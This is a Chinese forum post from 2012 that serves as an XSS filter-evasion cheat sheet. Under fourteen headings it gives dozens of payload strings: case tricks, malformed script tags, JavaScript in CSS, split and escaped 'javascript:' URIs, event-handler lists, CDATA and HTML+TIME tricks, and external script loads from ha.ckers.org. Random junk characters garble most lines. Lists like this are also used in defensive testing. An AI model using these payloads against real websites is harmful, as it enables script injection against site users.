1. 改变字符大小写1 X4 M& ]9 y: d
1 H+ f4 M# e% A6 b4 U! x9 |
) r' E4 q3 m' L& i0 t
1 X4 v' a4 K1 k8 a4 H6 a, ~6 @ <sCript>alert(‘d’)</scRipT>
3 G3 f: ]! {8 B j, |7 j& v
7 Y1 a) S. \& h2. 利用多加一些其它字符来规避Regular Expression的检查; I5 Q9 ]( |+ B: d- J
! \: J: M# F, z; O8 X% N# A4 R0 ]
<<script>alert(‘c’)//<</script>
: Y/ _3 X1 s' B% s( q1 U: R6 [- y4 s7 Y5 u1 r7 c
<SCRIPT a=">" SRC="t.js"></SCRIPT>! D1 s8 K) y+ u! H/ k
, h1 r% f0 G8 u/ W <SCRIPT =">" SRC="t.js"></SCRIPT>
. }- c0 ^& d u. q6 b, B$ f# a1 N0 r0 M" B3 D3 J/ J& m: q
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>, \6 b$ j2 D/ g; h( A$ z
, V+ W0 d \' E, q g2 p; ~' y) A* s1 r <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>& Q. ]% f+ h& u3 z
- _- S! N, G5 o, j" I( b* `: S% g <SCRIPT a=`>` SRC="t.js"></SCRIPT>
8 Y4 l+ D* x: ^8 I+ F- g3 L" G `7 m9 N
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>( f- F2 H. M3 u# e+ Q, e
3 w8 k5 H* {' _, X: M+ A% p% o. S3. 以其它扩展名取代.js7 \) ~5 q n+ o5 j$ S9 H
1 i2 \& h) K8 J
<script src="bad.jpg"></script>
9 e. E' P0 ?% E* {( I
4 g" O2 k; C7 Y3 \! S4. 将Javascript写在CSS档里
& w8 k7 \( C6 h% w- i: x, c/ n1 \- m U2 ^+ Q
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
1 h: W: |! D; ^4 O0 N4 a [, l& l) y- C9 O
example:
a8 @0 R$ K/ o4 P/ _3 Q9 [& N/ [1 c8 R4 N" \" M
body {, _; i( {, M+ _8 i% |0 M% V
) c# @/ F2 k- y4 C# J: K. \% y background-image: url(‘javascript:alert("XSS");’)6 ]+ A3 z7 Q# R) N/ Z
9 B" q5 ~3 I+ {! r) D }
9 } i3 |- S: L( L5 S S! Y
5 G6 m3 @# E2 w- B* v4 x" r5. 在script的tag里加入一些其它字符% j& u# k: c6 ?6 Q E0 H
2 W9 z, u& z: {+ w
<SCRIPT/SRC="t.js"></SCRIPT>. m4 M6 Q o/ A4 V
9 j# A" X+ \ u0 B
<SCRIPT/anyword SRC="t.js"></SCRIPT>( K& `9 G/ W, _/ C- R7 o- ]6 ~$ ~
$ S8 i: t; h* k& W
6. 使用tab或是new line来规避3 _/ b7 V6 E: }. C( m4 @
* G D1 f" D/ V* Z. ]6 |. J0 r <img src="jav ascr ipt:alert(‘XSS3′)">$ T# }2 w+ l9 p. L# W
. D& z% p, Z X$ X: C- Q <img src="jav ascr ipt:alert(‘XSS3′)">
5 U6 ]8 @9 ^" A# b- S5 D; Z+ ?2 T( l5 M3 \. V4 S4 o
<IMG SRC="jav ascript:alert(‘XSS’);">
! Z7 b/ |& X- g% h
# c( B; b0 U4 M -> tag# t7 M: {/ f. ^! A
! x+ W- g2 m" g! w" d: l& T -> new line& ]* w- w9 C, I
* i/ X6 Y) T6 I: g. ?5 r ?% \: m
7. 使用"\"来规避7 l, P# R- ?! w
' L6 c2 t& j: L1 F, ]1 p2 h
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
- b" o2 B% G' e! |# ~1 d! ~5 R7 D$ W+ y& r
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>( g2 s( Y6 L5 ^& @; i* C& d$ K
p) p6 H% p/ n6 V. k" | <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
$ x4 ~9 u5 X4 `" g% s! `: l& F! Z. Z; J9 J' v0 t% W
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">" _. h; _% S. V) n
+ F2 S }0 T: j3 ^, x
<A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
; f. Z3 L' B0 g/ H0 J) q2 z, s6 u, X* Q& A
8. 使用Hex encode来规避(也可能会把";"拿掉)2 n- X/ Z; c$ b6 _. {) u: z
7 N* H1 O! p3 j8 \5 t1 k
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
) R% i) r; |- y. N% L) _6 W2 k' M7 T( b2 U6 s3 X" z) n
原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">. D8 J2 ?/ `% ]* b
" ^' o/ p: ]) X; X+ |2 f; j# W
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">8 O8 X! j# o9 i4 l
9 }) @7 m; T$ L! d 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">* E6 x' K& {6 U% x* G
; c5 w/ r- W5 |3 R3 Z9. script in HTML tag) H& s7 k; z* Y4 d7 U' ^
" A' U8 `/ Q/ d: O* n: e
<body onload=」alert(‘onload’)」>+ f5 b: A: B3 O! e) u" ?
! B c: B! Y4 @
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload- L! Y% M z; X( m, g) ?7 P, V' Y: {
0 {8 [: t3 l7 O$ }/ Y0 m' ?4 Z. |10. 在swf里含有xss的code: e& M/ ]" j( R2 [& |' O$ ^' W1 |
& i8 T. B0 W. M S, D5 Z0 i" L
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
! F# \% l& p) C( B0 E+ S7 }5 _
+ X. H% L" B" A; k$ ^0 }11. 利用CDATA将xss的code拆开,再组合起来。
, P' E( T. d7 }, i
; [% ]5 s3 S( t0 _& S9 _- A <XML ID=I><X><C>
& p+ v4 g4 p& \! j0 i8 D/ S
+ C4 A4 X6 z4 R7 y9 a/ _; S) r* [+ f <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
! k( H2 }7 W/ l4 O. g/ M; i
. [# I$ K- j, T; o </C></X>9 N0 p1 u5 c2 _
, D6 X; G5 P8 m& Q) N
</xml>' \& _: X, G4 G( t% v& X
2 h4 @( Z; v3 @/ c <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
3 M5 Z# G) w2 j
0 B! A: ?4 u) D <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
$ t# V0 y7 `# l! Y# y% S" ^' Q$ \" @* ?
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
% ~5 m% l9 k; |6 Y- D
0 K: @! ~6 ]+ Z! K% N- {+ B12. 利用HTML+TIME。* y+ ]( @9 U# I- r) U4 @' I
; b3 @1 ^% P/ e. Y
<HTML><BODY>3 r( _" e5 n6 k% X$ Z: u! E
; _ c, U, k1 Y: S <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">& _( }+ r9 k2 x, h! N
' @# Q8 \/ c: g/ T4 j m- C <?import namespace="t" implementation="#default#time2">
6 {+ c0 p6 c/ q2 h0 ?
" O* Z1 {# s l5 h1 n- x$ u6 } <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
* _6 ]9 f: C7 o/ P6 i* l" s. q0 j8 {
</BODY></HTML>6 ~4 p: e0 k0 t0 V, Q0 p
* K' e% n" I) d! t$ x& W13. 透过META写入Cookie。2 w* O: Q/ s- X
9 |$ ^+ W9 G2 X {' _4 [ <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>"> u& B, b9 `) j k" m% H3 q7 B, }
% k2 S9 F# C: ?14. javascript in src , href , url
! a. E& B- W( ?0 v/ x- l( Z; b1 ^5 }/ T( r+ P2 y- X! C
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
( q7 n, B2 J$ |! p# f/ i
( m+ m) s* p: f. T+ X <img src="javascript:alert(‘XSS3′)">
$ e, O/ w9 W1 q4 C
1 @2 |6 \* A% K$ V: g4 j( d<IMG DYNSRC="javascript:alert(‘XSS20′)">& z) b7 n4 W4 v! r5 ^; C3 G m9 @
' U5 v3 U7 n0 T' W* x. S- p: E <IMG LOWSRC="javascript:alert(‘XSS21′)">
0 J8 {1 _* Y6 c, |' ^- l- m3 T0 i4 c+ p" ]1 X, g8 O
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
- F; n5 Q/ I% H* s
' y- K. f' G! e+ {" |% O& T; f <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
9 M3 \+ s- `3 o8 L8 o6 x; A. O T6 L# f9 D- C
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
/ e9 Q# n7 s1 D+ X5 N( R' c) V0 j2 H& i3 e0 w+ h
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">8 k g' K- {, L- m
! c9 j/ U5 I, K- s
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}4 h) O( C& M: k% }, p9 k, w0 ~ M* b
4 `3 _$ N% Z' V+ j/ B5 F! X
</STYLE><A CLASS=XSS></A>8 o; O1 v. h$ K, _( Y
% ]$ ]4 t1 V S+ M9 n$ |
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>2 k; ]9 G( X, j* Y
. i7 X. e5 f7 `
|
发表于 2012-12-31 09:59:28
收藏
支持
反对